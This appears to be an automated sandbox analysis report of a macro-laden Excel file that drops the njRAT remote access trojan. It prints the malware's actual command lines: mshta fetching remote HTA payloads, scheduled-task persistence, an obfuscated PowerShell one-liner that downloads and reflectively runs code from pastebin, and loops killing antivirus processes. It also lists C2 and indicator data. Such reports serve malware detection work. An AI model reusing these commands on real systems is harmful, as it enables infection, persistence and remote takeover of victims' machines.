File name: 62706e2512e5a7f369730cce4ab45d70703c762d8eb6dba7148b8099f7c39fac

Full analysis: https://app.any.run/tasks/fc4e953f-4a91-446b-9a08-9b6a72d5762c
Verdict: Malicious activity
Threats: njRAT

njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market and comes with an abundance of educational material; prospective attackers can even find tutorials on YouTube. That availability has made it one of the most popular RATs in the world.

Analysis date: January 11, 2019, 04:33:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, trojan, rat, njrat, bladabindi
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: GonzoMobzaluz, Last Saved By: GonzoMobzaluz, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 03:30:06 2018, Last Saved Time/Date: Wed Dec 19 03:42:50 2018, Security: 0
MD5: 47C3D3B14634C1B9FED79FC961F7DA0B
SHA1: 086463BAB82480E89A79722701DF1C543E378FDA
SHA256: 62706E2512E5A7F369730CCE4AB45D70703C762D8EB6DBA7148B8099F7C39FAC
SSDEEP: 1536:eDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAbdIxtckcfyKH+xDH8mCUO7xTvrsgR:eDZ+RwPONXoRjDhIcp0fDlaGGx+cL26x

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Unusual execution from Microsoft Office
      • EXCEL.EXE (PID: 2916)
    • Starts MSHTA.EXE for opening HTA or HTMLS files
      • EXCEL.EXE (PID: 2916)
    • Uses Task Scheduler to run other applications
      • mshta.exe (PID: 2224)
    • Changes settings of System certificates
      • mshta.exe (PID: 2224)
    • Loads the Task Scheduler COM API
      • schtasks.exe (PID: 2872)
      • schtasks.exe (PID: 3396)
    • Connects to CnC server
      • powershell.exe (PID: 2528)
    • NJRAT was detected
      • powershell.exe (PID: 2528)
  • SUSPICIOUS
    • Adds / modifies Windows certificates
      • mshta.exe (PID: 2224)
    • Starts MSHTA.EXE for opening HTA or HTMLS files
      • mshta.exe (PID: 1028)
    • Application launched itself
      • mshta.exe (PID: 1028)
    • Creates files in the user directory
      • mshta.exe (PID: 2224)
      • powershell.exe (PID: 2528)
    • Starts CMD.EXE for commands execution
      • mshta.exe (PID: 2224)
    • Uses TASKKILL.EXE to kill Office Apps
      • cmd.exe (PID: 3600)
    • Uses TASKKILL.EXE to kill process
      • forfiles.exe (PID: 3912)
      • forfiles.exe (PID: 3028)
      • forfiles.exe (PID: 3364)
      • forfiles.exe (PID: 3156)
      • cmd.exe (PID: 3600)
      • forfiles.exe (PID: 2140)
      • forfiles.exe (PID: 2256)
      • forfiles.exe (PID: 4052)
      • forfiles.exe (PID: 2524)
      • forfiles.exe (PID: 1228)
      • forfiles.exe (PID: 3416)
      • forfiles.exe (PID: 3728)
    • Executes PowerShell scripts
      • forfiles.exe (PID: 2188)
    • Connects to unusual port
      • powershell.exe (PID: 2528)
  • INFO
    • Creates files in the user directory
      • EXCEL.EXE (PID: 2916)
    • Reads internet explorer settings
      • mshta.exe (PID: 2224)
      • mshta.exe (PID: 1028)
    • Reads Microsoft Office registry keys
      • EXCEL.EXE (PID: 2916)
    • Reads settings of System Certificates
      • powershell.exe (PID: 2528)
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Office Excel 2003 Worksheet
CompObjUserTypeLen: 38
HeadingPairs:
  • Worksheets
  • 3
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
Company: Grizli777
CodePage: Windows Latin 1 (Western European)
Security: None
ModifyDate: 2018:12:19 03:42:50
CreateDate: 2018:12:19 03:30:06
Software: Microsoft Excel
LastModifiedBy: GonzoMobzaluz
Author: GonzoMobzaluz
Total processes: 195
Monitored processes: 159
Malicious processes: 15
Suspicious processes: 3

Behavior graph

(Rendered process graph not reproduced in this extract. The full report shows the chain starting at excel.exe, then mshta.exe launching a second mshta.exe, which spawns schtasks.exe and cmd.exe; the cmd.exe instances run repeated forfiles.exe/taskkill.exe loops, and one powershell.exe process is tagged #NJRAT.)

Process information

PID: 2916
CMD: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Excel
Exit code: 1
Version: 14.0.6024.1000

PID: 1028
CMD: mshta vbscript:CreateObject("Wscript.Shell").Run("mshta http://www.bitly.com/lullimyra29",0,true)
Path: C:\Windows\system32\mshta.exe
Parent process: EXCEL.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 1
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 2224
CMD: "C:\Windows\System32\mshta.exe" http://www.bitly.com/lullimyra29
Path: C:\Windows\System32\mshta.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID: 2872
CMD: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://b67x.blogspot.com/p/blog-page.html\",0,true)(window.close)" /F
Path: C:\Windows\System32\schtasks.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3356
CMD: "C:\Windows\System32\cmd.exe" /C forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & exit
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3396
CMD: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 10 /tn "MS-OFFICE" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://pastebin.com/raw/urGHE2PF\",0,true)(window.close)" /F
Path: C:\Windows\System32\schtasks.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3428
CMD: "C:\Windows\System32\cmd.exe" /C forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/7ihEfAZF'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000"
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3600
CMD: "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im mshta.exe & exit
Path: C:\Windows\System32\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3912
CMD: forfiles /c "taskkill /f /im AvastUi.exe"
Path: C:\Windows\system32\forfiles.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: ForFiles - Executes a command on selected files
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2188
CMD: forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/7ihEfAZF'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000"
Path: C:\Windows\system32\forfiles.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: ForFiles - Executes a command on selected files
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 383
Read events: 1 187
Write events: 188
Delete events: 8

Modification events

(PID) Process: (2916) EXCEL.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation: write
Name: ?}$
Value: 3F7D2400640B0000010000000000000000000000

(PID) Process: (2916) EXCEL.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: Off

(PID) Process: (2916) EXCEL.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: On

(PID) Process: (2916) EXCEL.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
Operation: write
Name: MTTT
Value: 640B000054148FDB66A9D40100000000

(PID) Process: (2916) EXCEL.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation: delete value
Name: ?}$
Value: 3F7D2400640B0000010000000000000000000000

(PID) Process: (2916) EXCEL.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation: delete key
Name:
Value:

(PID) Process: (2916) EXCEL.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
Operation: delete key
Name:
Value:

(PID) Process: (2916) EXCEL.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 0

(PID) Process: (2916) EXCEL.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 1

(PID) Process: (2916) EXCEL.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\199E79
Operation: write
Name: 199E79
Value:
Executable files: 0
Suspicious files: 4
Text files: 16
Unknown types: 2

Dropped files

PID: 2916  Process: EXCEL.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR958F.tmp.cvr
Type:
MD5:
SHA256:

PID: 2528  Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DTO8ZWWAM11CILGY2LFG.temp
Type:
MD5:
SHA256:

PID: 2916  Process: EXCEL.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~DFD4B27C6EAC610ABC.TMP
Type:
MD5:
SHA256:

PID: 2916  Process: EXCEL.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\62706e2512e5a7f369730cce4ab45d70703c762d8eb6dba7148b8099f7c39fac.xls.LNK
Type: lnk
MD5: 3BD65FA7B19CD742778408FAAA7D6915
SHA256: A53074894AF9A197D9F458AA04C45CFB1484B4AB063F63015C6F0E0BBF109D77

PID: 2224  Process: mshta.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txt
Type: text
MD5: BC5C1B03980BF0B912EE015B07E229FA
SHA256: 51A22674BED62808F7EF804C00B83DE0AABA12537F9CED3385A1FBE4EDF75A18

PID: 2224  Process: mshta.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\error[1]
Type: text
MD5: 35FE91C2AC1BA0913CC617622B9EB43F
SHA256: 966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837

PID: 2224  Process: mshta.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\2727757643-css_bundle_v2[1].css
Type: text
MD5: C6BEF00B7471799FB84ECD3C7D93B889
SHA256: 797E19AC51BD552CB84849B171FAD7CF0563B4A14BDC3F751D1EDAC71064FF56

PID: 2528  Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19b702.TMP
Type: binary
MD5: 901ECDF767744E6BB59CB023757886E3
SHA256: 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1

PID: 2528  Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 901ECDF767744E6BB59CB023757886E3
SHA256: 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1

PID: 2224  Process: mshta.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\error[1]
Type: text
MD5: 35FE91C2AC1BA0913CC617622B9EB43F
SHA256: 966240C0527B20E8E2553B7E5A68594AE69230AA00186F2C6C2C342405494837
HTTP(S) requests: 2
TCP/UDP connections: 10
DNS requests: 5
Threats: 0

HTTP requests

PID  | Process   | Method | HTTP Code | IP               | URL                              | CN | Type | Size  | Reputation
2224 | mshta.exe | GET    | 301       | 67.199.248.14:80 | http://bitly.com/lullimyra29     | US | html | 122 b | shared
2224 | mshta.exe | GET    | 301       | 67.199.248.14:80 | http://www.bitly.com/lullimyra29 | US | html | 178 b | shared

Connections

PID  | Process        | IP                 | Domain            | ASN            | CN | Reputation
2528 | powershell.exe | 104.20.209.21:443  | pastebin.com      | Cloudflare Inc | US | shared
2224 | mshta.exe      | 172.217.23.129:443 | b67x.blogspot.com | Google Inc.    | US | whitelisted
2224 | mshta.exe      | 67.199.248.14:80   | www.bitly.com     | Bitly Inc      | US | shared
2224 | mshta.exe      | 216.58.207.73:443  | www.blogger.com   | Google Inc.    | US | whitelisted
2528 | powershell.exe | 194.68.59.43:2445  |                   | Inleed AB      | SE | malicious

DNS requests

Domain                 | IP                           | Reputation
www.bitly.com          | 67.199.248.14, 67.199.248.15 | shared
b67x.blogspot.com      | 172.217.23.129               | whitelisted
www.blogger.com        | 216.58.207.73                | shared
resources.blogblog.com | 216.58.207.73                | whitelisted
pastebin.com           | 104.20.209.21, 104.20.208.21 | shared

Threats

PID  | Process   | Class                         | Message
2224 | mshta.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.Downloader httpHeader
2224 | mshta.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.Downloader httpHeader
1 ETPRO signature is available in the full report
No debug info